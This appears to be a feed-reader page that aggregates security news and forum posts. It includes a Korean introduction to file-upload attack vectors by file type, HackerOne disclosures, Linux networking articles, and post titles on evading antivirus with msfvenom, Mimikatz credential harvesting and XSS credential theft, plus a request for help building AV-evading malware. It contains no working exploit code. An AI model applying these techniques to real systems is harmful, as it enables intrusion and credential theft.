    🔍 Introduction File upload는 웹에서 많이 사용되는 기술입니다. 로컬에 있는 파일을 서버로 업로드하는 기능인데, 안전하지 않은 파일이 업로드 되는 것은 보안적인 문제를 가집니다. 그리고 이렇게 File Upload를 이용한 공격들을 Insecure File Upload, Upload Insecure FIle, FIle Upload 취약점 등으로 불립니다. 보통 이러한 Insecure File Upload은 조건에 따라 WebShell, XSS, CSRF, 악성 파일 배포 경유지 등으로 사용되며 XSS 만큼 굉장히 넓은 영향을 가집니다. 🗡 Offensive techniques Detect File이 업로드 되는 구간은 모두 테스팅 포인트가 됩니다. 대표적으로 파일 업로드가 목적인 기능들, 이미지 등을 업로드 하는 기능들이며 이러한 부분은 눈으로 직접 식별하거나 도구들의 Passive Scan을 통해서 식별할 수 있습니다. File Type 별 Attack Vector Extensions Attack Vectors JSP, ASP, PHP (ASPX, PHP5, Etc) Webshell / RCE SVG, XML (And XML Based File) Persistant XSS / SSRF / XXE GIF Persistant XSS / SSRF CSV CSV injection AVI, MP4, MPEG (Videos) LFI / SSRF HTML, JS HTML injection / XSS / Open redirect PNG, JPEG Persistant XSS, Pixel flood attack (DoS) ZIP RCE via LFI / DoS PDF, XSLX, PPTX, DOCS (OXML) SSRF / BLIND XXE Exploitation WebShell Upload된 파일이 동작하는 서버가 PHP, JSP, ASP, Perl 등 파일 자체로 Server-side 동작이 가능한 경우 이를 통해 웹쉘을 업로드하여 시스템을 탈취할 수 있습니다. Extensions PHP .php...
    WebSocket Security
    🔍 Introduction WebSocket은 비 연결형 요청인 HTTP의 단점을 보와하여 서버와 브라우저가 실시간으로 통신할 수 있도록 만들어진 프로토콜로 HTTP 기반의 Handshake 이후 TCP/TLS를 통해 통신하며 데이터를 교환할 수 있습니다. 비슷한 기능으로 SSE (Server Sent Event)가 있습니다. SSE의 경우 일방향 통신을 위한 기술이고, WebSocket은 양방향 통신을 위한 기술입니다. Handshake and Data transfer WebSocket의 통신 과정은 Handshake 와 Data transfer로 나눌 수 있습니다. Handshake WebSocket은 기본적으로 웹 위에서 동작하기 때문에 HTTP 프로토콜을 통해 Handshake 과정이 시작됩니다. 브라우저에서 웹 서버로 Upgrade Request를 전송하게 되면, 서버는 브라우저에게 HTTP Response로 상태값을 전달하게 됩니다. 101 Switching Protocols 400 Bad Request 415 Unsupported Media Type 등 성공 시 101 Switching Protocols을 리턴하면서 upgrade 헤더에 websocket으로 명시하여 브라우저가 WebSocket Connection을 연결하여 Data transfer 과정으로 넘어갑니다. Data transfer WebSocket Handshake 이후 Data transfer 과정은 일반 Socket 통신과 유사하게 특정한 포맷 없이 데이터를 전송/수신할 수 있습니다. Framework나 Library에 따라 추가적인 프로토콜을 사용하는 경우도 있습니다. 대표적으로 Springboot의 STOMP 프로토콜이 있습니다.` WS:// and WSS:// http:// https:// 의 차이점 처럼 WebSocket도 ws:// wss:// 와 같이 비 암호화 소켓과 암호화 소켓으로 나뉩니다. 당연히 https:// 에서는 Mixed contents를 금지하고 있기 때문에 ws://로 강제 연결되지는 않습니다. Example if ('WebSocket' in window) { var oSocket = new WebSocket("ws://localhost:80"); oSocket.onmessage = function (e) { console.log(e.data); }; oSocket.onopen = function...
  • Open

    Linux Forensics
    Good morning, Does anyone have any recommendations on books for Linux Forensics? What about learning resources in general? Happy weekend and happy learning. submitted by /u/DeadBirdRugby [link] [comments]
  • Open

    Day to Day activities of an Azure admin
    Hi Team, If there are any azure administrators in this group who has shifted your career from Windows Administrator role, I just want know what are your Real-time Day-to-Day activities you are performing in your organization on azure portal as an azure admin like Application registration, VM Provisioning..etc submitted by /u/Krish03101991 [link] [comments]
  • Open

    Federated editing allows iframing possibly malicious remotes
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1210424 - Bounty: $100
  • Open

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »
  • Open

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »
  • Open

    Bulk Analysis of Cobalt Strike’s Beacon Configurations
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Linux 网络栈原理、监控与调优:前言
    本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 Linux 网络栈发送数据(TX):原理及内核实现(TBD) 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 Linux 网络栈发送数据(TX):配置调优(TBD) 作为网络、虚拟化、稳定性等方向的研发工程师,我们经常会遇到各种各样的网络问题。 按照著名的 80/20 定律, 这些问题中的 80% 都属于常规问题,通过系统或服务日志、历史经验或者 Google、StackOverflow 搜索解决;所花时间在几分钟到几个小时不等; 剩下的 20% 就无法快速定位并解决,需要一些额外专业知识和时间来排查,例如,粗看一些相关代码,把可疑点提交到社区或邮件列表讨论等等;所花时间在几个小时到几天不等。 如果对这 20% 再用一次 80/20 定律,那这 20% 里面, 80% 的问题(20% * 80% = 16%)都能通过几个小时或几天的看代码、测试或社区帮助来解决, 剩下的 20%(20% * 20% = 4%),就需要更加深入的钻研才有可能定位到问题。 如果你愿意,还可以再用 80/20 法则继续分下去,第三次剩下的将是 0.8% —— 这个长尾 已经足够小了,但解决这些问题花费的时间一般也足够长。 对于这一部分(性能)问题,我们必须系统地学习整个网络栈,理解数据包从到达 网卡之后分别经过哪些模块、进行什么处理,一直到最终被应用程序收起的整个过程,没 有其他捷径,除非你们的业务方能忍受这份长尾,或者通过工程手段绕过这些问题, 例如最简单的加机器降负载。但在云原生时代、网络可编程的今天,功能需求也同样要求我们具备 内核网络栈这一领域知识。例如,K8s 是采用了非常灵活的 spec & impl 设计,它以契约规范的方式描述了很多 k8s 的功能应该是什么样,而具体实现则交给开发者或厂商,网络相关的两个例子: ServiceIP:抽象了一个 L4 负载均衡方案,怎么实现、用什么技术来实现完全由网络方案来决定; NetworkPolicy:抽象了一个 L3/L4 访问控制方案,怎么实现、用什么技术来实现也是完全由网络方案来决定; 如果让你来实现这两个方案(demo),你觉得需要哪些网络知识?需要熟悉网络栈的哪些模块和子系统?熟悉到什么程度? 两篇参考: Cracking Kubernetes Node Proxy (aka kube-proxy) Cracking Kubernetes Network Policy 有了对内核网络的完整理解,就会发现一片新天地,对于前面那若干层 “80” 问题,也会有完全不一样的认识。 早年的 Linux 网络栈监控和调优:接收数据(2016) 因为很多原因在今天的参考价值越来越小: 内核和网卡驱动太老(kernel 3.13,1Gbps 网卡驱动 igb),尤其对容器和网络虚拟化团队,这种配置都是古董机了: 全是文字,没有图,非常不直观(后来原作者有一篇配套图解,但只有几张图,也已经太老了); 监控和调优杂内容糅在代码分析里,略乱,无法快速检索;一些调优建议已经过时; 没有介绍如何用比较现代的监控体系,例如 Prometheus+Grafana,来可视化监控核心指标; … 本文参考了那篇文章的主线,基于新内核重新整理了整个网络栈处理过程和一些监控调优选项, Kernel 基于 5.10,网卡基于 Mellanox 25Gbps mlx5_core 驱动; 添加了二十多张核心模块的流程图和调用栈,更直观,帮助理清主线; 将监控和调优部分单独拆出来,方便快速检索与查阅,避免在琐碎细节之间跳来跳去;根据内核版本和生产经验更新了一些调优建议; 展示了如何基于现代监控系统来监控网络指标; 适当添加了一些近几年出现的新内容,例如 BPF/XDP。 本文写的是 “Linux networking stack”,这里的 “stack” 指的不仅仅是内核协议栈, 而是包括内核协议栈在内的、从数据包到达物理网卡到最终被用户态程序收起的整个路径, 如下图所示(接收数据路径和步骤): Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post 本文还有很多地方不完善,可能还有一些错误,仅作学习参考,后续会不定期更新。
    Linux 网络栈接收数据(RX):配置调优
    本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 1 网络设备驱动初始化 1.1 调整 RX 队列数量(ethtool -l/-L) 1.2 调整 RX 队列大小(ethtool -g/-G) 1.4 调整 RX 队列权重(ethtool -x/-X) 1.5 调整 RSS RX 哈希字段(ethtool -n/-N) 1.6 Flow 绑定到 CPU:ntuple filtering(ethtool -k/-K, -u/-U) 2 网卡收包 3 DMA 将包复制到 RX 队列 4 IRQ 4.1 中断合并(Interrupt coalescing,ethtool -c/-C) 4.2 调整硬中断亲和性(IRQ affinities,/proc/irq//smp_affinity) 5 SoftIRQ 5.1 问题讨论 关于 NAPI pool 机制 perf 跟踪 IRQ/Softirq 调用 /proc/net/softnet_stat 各字段说明 5.2 调整 softirq 收包预算:sysctl netdev_budget/netdev_budget_usecs 6 softirq:从 ring buffer 收包送到协议栈 6.1 修改 GRO 配置(ethtool -k/-K) 6.2 sysctl gro_no…
    Linux 网络栈接收数据(RX):原理及内核实现
    Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post 本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 Linux 网络栈发送数据(TX):原理及内核实现(TBD) 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 Linux 网络栈发送数据(TX):配置调优(TBD) 0 收包过程(RX)俯瞰 1 网卡驱动初始化 1.1 A little bit things about Mellanox NIC drivers 1.2 驱动模块注册:module_init() -> init() -> pci/mlx5e init 1.3 PCI 相关初始化 1.3.1 PCI 驱动列表注册:pci_register_driver() 1.3.2 内核为网卡搜索和加载驱动:pci_driver->probe() 调用栈和流程图 初始化 devlink:mlx5_devlink_alloc() 初始化 debugfs 和一些 WQ:mlx5_mdev_init() 初始化 PCI 相关部分:mlx5_pci_init() 初始化硬中断(IRQ)、设置网卡状态为 UP:mlx5_load_one() 1.4 以太网相关初始化:mlx5e_init() …
    Linux 中断(IRQ/softirq)基础:原理及内核实现
    1 什么是中断? 2 硬中断 2.1 中断处理流程 2.2 Maskable and non-maskable 2.3 问题:执行足够快 vs 逻辑比较复杂 2.4 解决方式:延后中断处理(deferred interrupt handling) 3 软中断 3.1 软中断子系统 3.2 主处理 3.3. 避免软中断占用过多 CPU 3.4 硬中断 -> 软中断 调用栈 软中断触发执行的步骤 4 三种推迟执行方式(softirq/tasklet/workqueue) 4.1 softirq 内部组织 触发(唤醒)softirq 4.2 tasklet 4.3 workqueue 使用场景 结构体 参考资料 中断(IRQ),尤其是软中断(softirq)的重要使用场景之一是网络收发包, 但并未唯一场景。本文整理 IRQ/softirq 的通用基础,这些东西和网络收发包没有直接关系, 虽然整理本文的直接目的是为了更好地理解网络收发包。 1 什么是中断? CPU 通过时分复用来处理很多任务,这其中包括一些硬件任务,例如磁盘读写、键盘输入,也包括一些软件任务,例如网络包处理。 在任意时刻,一个 CPU 只能处理一个任务。 当某个硬件或软件任务此刻没有被执行,但它希望 CPU 来立即处理时,就会给 CPU 发送一个中断请求 —— 希望 CPU 停下手头的工作,优先服务“我”。 中断是以事件的方式通知 CPU 的,因此我们常看到 “XX 条件下会触发 XX 中断事件” 的表述。 两种类型: 外部或硬件产生的中断,例如键盘按键。 软件产生的中断,异常事件产生的中断,例如除以零 。 管理中断的设备:Advanced Programmable Interrupt Controller(APIC)。 2 硬中断 2.1 中断处理流程 中断…

  • Open

    Distros and RegRipper, pt deux
    Now and again I pop my head up and take a look around to see where RegRipper has been, and is being, used. My last blog post on this topic had quite a few listings, but sometimes changing the search terms reveals something new, or someone else has decided to use RegRipper since the last time I looked. References to RegRipper go way back, almost as far as RegRipper itself (circa 2008): SANS blog (2009) SANS blog (2010) SANS Infosec Handler's Diary blog (2012) Kali Tools (RR v2.5) SANS Blog, Mass Triage, pt 4 (2019) The latest commercial forensics platform that I've found that employs RegRipper is Paraben E3. I recently took a look at the evaluation version, and found "rip.pl" (RegRipper v3.0 with modifications) in the C:\Program Files\Paraben Corporation\Electronic Evidence Examiner\PerlSmartAnalyzer folder, along with the "plugins" subfolder. You can see the Registry parsing in action and how it's incorporated into the platform at the Paraben YouTube Channel: AppCompatCache parsing Reviewing Data from AmCache Reviewing the videos, there's something very familiar about the output illustrated on-screen. ;-) Other Resources (that incorporate RegRipper) YouTube video by Ric Messier CAINE forensics video PacktPub Subscription LIFARS Whitepaper on Shellbags Windows Registry Forensics, 1/e (PDF) Paradigm Solutions blog Jason Shaver's NPS thesis (2015) That's just one more step toward world domination! This is where I tent my fingers and say "Excellent" like Mr. Burns! PS: While I was looking around recently, I saw something I hadn't seen before...early in Jan, 2020, an issue with the Parse::Win32Registry module parsing 64-bit time stamps was identified. I'd updated the module code, recompiled the EXEs, and put them up on Github.  I found recently that James, the author of the module, had updated it in Sept, 2020. That's great, but there are a few other tweaks I'd made to the code, one that allowed me to check to see if hives are 'dirty'.
  • Open

    GitLab远程代码执行漏洞(CVE-2022-2185)
    GitLab远程代码执行漏洞,该问题影响从 14.0 到 14.10.5、从15.0 到15.0.4以及从 15.1 到 15.1.1 的所有版本,其中授权用户可以导入恶意制作的项目,从而导致远...
  • Open

    GitLab远程代码执行漏洞(CVE-2022-2185)
    GitLab远程代码执行漏洞,该问题影响从 14.0 到 14.10.5、从15.0 到15.0.4以及从 15.1 到 15.1.1 的所有版本,其中授权用户可以导入恶意制作的项目,从而导致远...
  • Open

    What is being a malware analyst like?
    What is being a malware analyst like? How many hours do you guys work? Is it stressful? What certificate do I need to become a malware analyst? submitted by /u/ELIDAL99 [link] [comments]
    Email/Password vs Social Login vs Passwordless(magic links), which one is most vulnerable and how to choose the best strategy for users
    As a developer of user authentication library, I get asked this question a lot. This is definitely a subjective question and I struggle to answer this appropriately other than saying "it depends". So I want to open up this question to this knowledgeable community for opinions on how can developers choose the right authentication strategy for their users. Your experience as NetSec can be really valuable in educating the developers. You don't need to answer everything, just pick one aspect and share your thoughts. By the end of the discussion, we will have a useful conversation that developers can learn from. submitted by /u/10xpdev [link] [comments]
    SANS SEC 560 Class Notes by Jeff McJunkin
    Found this old tweet from Jeff McJunkin for his SANS SEC560 class in Minneapolis. https://twitter.com/jeffmcjunkin/status/755395680194039808 I thought it might be useful to the infosec community especially to those who are planning to take this exam. You can find the doc here. https://docs.google.com/document/d/19qp1aLg8LG8_lT0a-R-ilXIq0rCXKAR011Nj1pVo5TI/edit Not sure if he keep updating this doc or not since he tweeted this 6 years ago. If you happen to know, let me know. Thanks submitted by /u/w0lfcat [link] [comments]
  • Open

    June 2022 Incident Report
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1622449
    Unauthorized Access - downgraded admin roles to none can still edit projects through brupsuite
    Omise disclosed a bug submitted by zombieesshx: https://hackerone.com/reports/1607756
  • Open

    Any idea what's going on here?
    Found this in a Google search: http://82.146.38.215/text/ ​ Appears to be arrays of text snippets randomly collected and loosely related to the subject implied by each filename. In the middle of a file on customer complaints, there appears to be text from websites about cookie policies, which makes me think this is randomly collected. Do these look like fragments to form random text at the end of spam messages? Phrases for training a neural network? Something else? Just curious. submitted by /u/CommanderPowell [link] [comments]
    Not sure what this is -- Modules. Maybe someone could explain.
    submitted by /u/brother_p [link] [comments]
    Incel 101
    submitted by /u/brother_p [link] [comments]
    solar panel wiring diagrams and manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Just found this
    submitted by /u/thiskeepsmeupatnight [link] [comments]
    wget (maybe) help?
    Hi. Newb here. Not exactly OD related, buuuut I was wondering if someone could share a wget script, app, link or anything of the sort to help me download some files. The sites not online anymore, but I can access the files (.jpgs) via wayback machine. An example url would be something like http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Or https://web.archive.org/web/2014*/http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Many thanks in advance submitted by /u/bweezy320 [link] [comments]
  • Open

    War in Ukraine / June 30
    Russia left Snake island. It seems completely Continue reading on Medium »
  • Open

    SecWiki News 2022-07-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Building a scalable static analysis program at Razorpay
    submitted by /u/jubbaonjeans [link] [comments]
    Intel SGX deprecation review
    submitted by /u/hardenedvault [link] [comments]
    It’s Been Zero Days Since BIND9 Crashed
    submitted by /u/jen140 [link] [comments]
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf 周报 | 8月1日起施行《互联网用户账号信息管理规定》;加拿大前政府雇员参与勒索攻击
    经报网络安全审查办公室同意,BOSS 直聘、运满满、货车帮恢复新用户注册。
    Black Basta 勒索软件利用 QakBot 进行分发
    自 2022 年 4 月投入运营以来,Black Basta 对全球近 50 家组织发起了攻击。攻击者使用了“双重勒索”策略,如果受害者不交付赎金就会被公开数据。
    Revive:从间谍软件进化成银行木马
    2022 年 6 月,Cleafy 研究人员发现了一个新的安卓银行木马 Revive。
    「斗象攻防演练宝典」之“红队隐蔽隧道检测”
    象守结合隐蔽隧道静态特征和隐蔽隧道模型,让隐蔽隧道通讯攻击无处藏身。
    攻防演练中如何“防钓鱼” | FreeBuf甲方群话题讨论
    HVV期间,钓鱼实战手法可能花样百出,那可以有何检测防御措施?在钓鱼实战中,可以有哪些策略有效检验员工的安全意识?
    BlueHound-一款自研主机威胁狩猎工具
    BlueHound 是一款GUI版本主机威胁狩猎工具。支持上机/离线扫描webshell、CobaltStrike的beacon程序扫描以及内存扫描,基于.NET 4.6编译。
    企业安全建设 | 信息安全建设实践路程思考
    企业在进行信息安全建设规划时,“纵深防御”体系成为多数企业适用的架构参考,在其思想指导下,为了构建完善的安全防护体系和不断提升安全防护能力,对信息安全工作进行顶层架构设计和全面的规划布局属于第一要务。
    直指word附件,勒索软件AstraLocker 2.0来袭!
    近期,一种鲜为人知的名为AstraLocker的勒索软件发布了它的第二个主要版本。
    恶意软件利用API Hammering 技术规避沙盒检测
    研究人员在最近发现的 Zloader 和 BazarLoader 样本中发现了沙盒规避技术 API Hammering 的新实现。
    MuddyWater 持续瞄准中东发起攻击
    MuddyWater 被认为是由伊朗革命卫队运营的组织,主要维护伊朗的国家利益。
    FreeBuf咨询×漏洞盒子联合发布《2022网络安全攻防视图》
    CSAD 视图囊括泛行业网络安全攻击路径图、泛行业网络安全防御路径图、环境安全布局图以及安全运营团队搭建图。
  • Open

    Learn about Docker Container Security in Detail
    Are you looking for a series of posts that take a deep look at containers from an information security perspective? In my blog's "Docker Container Security" series, I've got you covered. https://tbhaxor.com/docker-containers-security/ submitted by /u/tbhaxor [link] [comments]
    How to get started with malware development?
    Hi, I want to get started with malware development. I am familiar with python,c/cpp and asm32. I want to learn to build my own malware(complete control with win32 api) and a C2 framework. I recently finished asm and made my own shellcode encoder that brought down detection rate from 11 to 3. I want to build malware with av and der bypassed. I have just started learning bout win32 api but it feels like I’m missing a lot of concepts like handles, tchars etc which I don’t know about. There are just so many things to learn like win32 api, process injection etc and I have no idea where to start. Any help suggesting and ideal pathway would be really helpful. submitted by /u/Horse-Trojan [link] [comments]
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm [link] [comments]
  • Open

    what's the diffrent between logical copy to physical copy in windows forensics image?
    what's the main targets between them? submitted by /u/ArticleUseful211 [link] [comments]
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm [link] [comments]

  • Open

    Feishu / Lark Data Extraction
    Has anybody dealt with Feishu/Lark before? I need to export files and chat conversations and none of my tools (axiom, cellebrite) are capable of Extracting the data submitted by /u/Markarov_93 [link] [comments]
    How can I create my own tool to acquire RAM memory?
    Hi community … I want to build a tool like Belkasoft RAM capturer … But I’m not getting any idea about how to capture RAM via C or Python … Any suggestions would be great … thanks in advance submitted by /u/Aromatic_Ideal_2933 [link] [comments]
    Data recovery on a Lumia 550
    Internal data recovery I'm MSFT LUMIA 550, no sd card. Hey, I have been given a MSFT Lumia 550 to try and recover the internal data that has been lost but not having any luck. I run Windows and Linux, and have data recovery software for phones and Windows but it is not showing on either one? It shows on the file explorer but not in Disk Management or AOMEI Partition Assistant. Screen works and no other issues. If anyone could advise or point me in the right direction it would be great. Device information Model: Microsoft Lumia 550 19:43 Service provider: 02 Software: Windows 10 Mobile Installed RAM: 1 GB Version: 1709 OS build: 10.0.15254.527 Firmware revision number: 01078.00042.16352.50009 Hardware revision number: 3.0.0.1 Radio software version: 10c56.00030.0001 Chip SOC version: 8909 Screen resolution: 720x1280 submitted by /u/sudo_oth [link] [comments]
    Time Machine encrypted with Filevault2 wont accept known password.
    History: MacBook 15" Samsung 1TB AHCI SSD died, non recoverable (S4LN058A01 controller not supported in PC3000, degraded memory, corrupted firmware/bad bytes...), won't ID, any interaction with it will stay in BSY mode, won't clone. The only hope now was the Time Machine backup (Filevault2). This is with Monterey OSX. Time Machine backup is 1.5TB in iSCSI format, but I cloned it to a .img format to work with it now.I must say this backup was used everyday, and it would mount automatically when logged into the computer. There were two users, user1 and user2, both with the same password. Both admin. Password has been the same for years, but suddenly time machine wont mount, saying credentials are incorrect. I have seen this scenario happen to a lot of people over the years. There is also…
  • Open

    Advice on SEC599 vs SEC699
    Hi there, I'm seeking advice for a SANS course (or similar; money being no object for a single course) I did SEC555 a while ago but I'm not really into setting up SIEM anymore, more focused into devising new detection rules (that colleagues will be implementing). I'm very much "blue", not really into pure red courses/exams like OSCP or GPEN, but am interested in purple but my main driver is to learn new stuff as much as possible. We have fairly mature SIEM(s) with existing rules, and people reviewing and/or thinking about new ones. I'm already familiar with MITRE Att&ck and started prioritizing techniques for my domain of interest. What I'm looking for is a course that would bring the most value to my team, new ideas or ideas that we didn't think about, challenging the MITRE techniques prioritization, etc. I've looked at both 599 and 699 (even the 599 vs 699 FAQ on the SANS website) but can't decide... haven't found many reviews for 699. I wonder how much of 599 will be a refresh for me. I've also considered FOR572 because I've always wanted to do it, and we don't do much with the flows... I think we could get some low hanging fruits there (a NDR solution is being set up). Any advice or experience you can share is welcome, thanks! submitted by /u/FreshGap5328 [link] [comments]
    What should be checked to give network access from internal to external IP?
    Hello. I wonder how this happens in other companies. Perhaps you could share your experiences. Often I am asked by devs to change or create the firewall rules for their dev needs. Sometimes, it's hard for me to know how safe it is. If the request is from internal to external: 1) I'm checking to see if there are vulnerabilities on my machine that will have access the external IP. 2) I'm checking by any SSL checkers about encryption status on external IP/URL. 3) I always ask to be given a more specific IP ranges and ports. What kind of playbooks do you have? submitted by /u/athanielx [link] [comments]
  • Open

    Flubot: the evolution of a notorious Android Banking Malware
    submitted by /u/Goovscoov [link] [comments]
    RanSim: a ransomware simulation script written in PowerShell. Useful for testing your defenses and backups in a controlled simulation. The same script is used for encryption and decryption.
    submitted by /u/doctormay6 [link] [comments]
    Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    submitted by /u/McLabraid [link] [comments]
    Cloudy with a Chance of Risk: Managing Risks in Cloud-Managed OT Networks
    submitted by /u/c_f13 [link] [comments]
    How to expose a potential cybercriminal due to misconfigurations
    submitted by /u/CyberMasterV [link] [comments]
    Starting an AppSec program the simple way
    submitted by /u/theappsecteam [link] [comments]
    Golang code review notes by elttam
    submitted by /u/Gallus [link] [comments]
  • Open

    What Does Zero-Day Vulnerability Mean?
    Article URL: https://pacgenesis.com/what-does-zero-day-vulnerability-mean/ Comments URL: https://news.ycombinator.com/item?id=31938463 Points: 1 # Comments: 0
  • Open

    GitHub - lawndoc/RanSim: Ransomware simulation script written in PowerShell. Useful for testing defenses and backup in a controlled setting. The same script and key is used for decryption.
    submitted by /u/doctormay6 [link] [comments]
    New Offsec post: Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    TJNull posted this a few hours ago on the Offensive Security Blog, seems to utilise macros within Office to gain leverage, seems pretty cool. it's called "Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties. Tweet: https://twitter.com/TJ_Null/status/1542507690441682945?t=aa7IB9DN9CAddzT-Wc7Kmg&s=19 Article: https://www.offensive-security.com/offsec/macro-weaponization/ Also a proof of concept Proof of concept: https://m.youtube.com/watch?v=8ZePZzdVQT8&feature=emb_logo submitted by /u/McLabraid [link] [comments]
    Toll fraud malware: How an Android application can drain your wallet
    submitted by /u/SCI_Rusher [link] [comments]
    Harvesting Browser Passwords from Windows Credential Vault — Mimikatz
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    What are the most essential third-party risk management tools?
    Vulnerabilities in the supply chain may cause cyberattacks. It also means that the concerns or vulnerabilities in the supply chain may… Continue reading on Medium »
    Which company provides the best penetration testing services?
    At times, it may not be that easy to approach the best pen testing services. The market is full of unqualified professionals, misleading… Continue reading on Medium »
    Which company provides the best red team security consulting?
    It is not a straightforward question to answer as there are many established companies, which provide red team security assessment… Continue reading on Medium »
    HOW I HACKED A HEALTH INSTITUTION [Domain Admin Compromise]
    Hello everyone, today I will be bringing you a new war-story of mine that had just wrapped up in the recent months. At a high level, I was… Continue reading on Medium »
    Relaying NTLM Authentication from SCCM Clients
    tl;dr: Seriously, please disable NTLM Continue reading on Posts By SpecterOps Team Members »
  • Open

    Open redirect found on account.brave.com
    Brave Software disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1338437 - Bounty: $300
    Arbitrary file download via "Save .torrent file" option can lead to Client RCE and XSS
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/963155 - Bounty: $200
    Arbitrary file download due to bad handling of Redirects in WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/975514 - Bounty: $150
    Redirecting users to malicious torrent-files/websites using WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/968328 - Bounty: $200
    Browser is not following proper flow for redirection cause open redirect
    Brave Software disclosed a bug submitted by abhinavsecondary: https://hackerone.com/reports/1579374 - Bounty: $500
  • Open

    OSINT e Pubblica Amministrazione (di nuovo)
    Qualche (breve) riflessione, completamente “a braccio”. Continue reading on Medium »
    War in Ukraine / June 29
    The oil embargo has not yet produced visible results Continue reading on Medium »
    Dispelling Russian Lies About the Missile Strikes in Kremenchuk
    On June 27th, 2022, two Kh-22 anti-ship missiles outfitted with upwards of 1,000kg of explosives struck targets in Kremenchuk, Ukraine. Continue reading on Medium »
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    SecWiki News 2022-06-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Model ww2 things
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    6/30 XSS study log
    CORS Continue reading on Medium »

  • Open

    Securing mobile phones and apps, What endpoint solutions are you using?
    Hey everyone, currently working as a security admin at a mid-sized company. Lately I’ve been looking into different mobile phone security for our BYOD policy. As everyone knows, there’s been a bunch of phishing, OS exploits, and hacks on Instagram, which is primarily what our marketing team uses. My main concern being the phishing links or exploits that prevent the use of Instagram. I’ve already created visuals and ran the company through steps to ensure their safety when using the apps (Not clicking random links, sketchy links, giving out passwords, etc) but human error exists and I don’t want to be the one at fault if there’s an issue. Curious to know what everyone’s using at their companies, I’m looking beyond just VPN solutions as I feel we need something more secure and reliable like a full endpoint security system. So far I’ve been looking at Lookout, Check Point, and CrowdStrike, mainly because of their file protection systems in addition to apps, etc. Let me know! submitted by /u/psaiful28 [link] [comments]
    Creating Proxy like Burpsuite / ZAP Proxy
    Hi, any guide on creating tools like Burpsuite or Zap Proxy specifically the intercept module and the logger. I need to capture all the request including the HTTP Headers, request parameters and more Main Problem I already have a simple GUI Form (Java) literally GUI form without any functionality but I don't know how to get the request. If I remember correctly, during the installation of Burpsuite, the user should install a .cert file, should I also generate that one for my program? Thanks! submitted by /u/pldc_bulok [link] [comments]
  • Open

    Cryptographic failures in RF encryption allow stealing robotic devices | Cossack Labs
    submitted by /u/evilsocket [link] [comments]
    Exploiting Intel Graphics Kernel Extensions on macOS to Escape the Safari Sandbox
    submitted by /u/gaasedelen [link] [comments]
    CloudGoat detection_evasion Scenario: Avoiding AWS Security Detection and Response
    submitted by /u/hackers_and_builders [link] [comments]
    CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus
    submitted by /u/scopedsecurity [link] [comments]
    How to Steal Browser’s Autofill Credentials via Cross-Site Scripting (XSS)
    submitted by /u/obilodeau [link] [comments]
    How to Evade Windows Defender and Commercial AV with Msfvenom Payloads
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
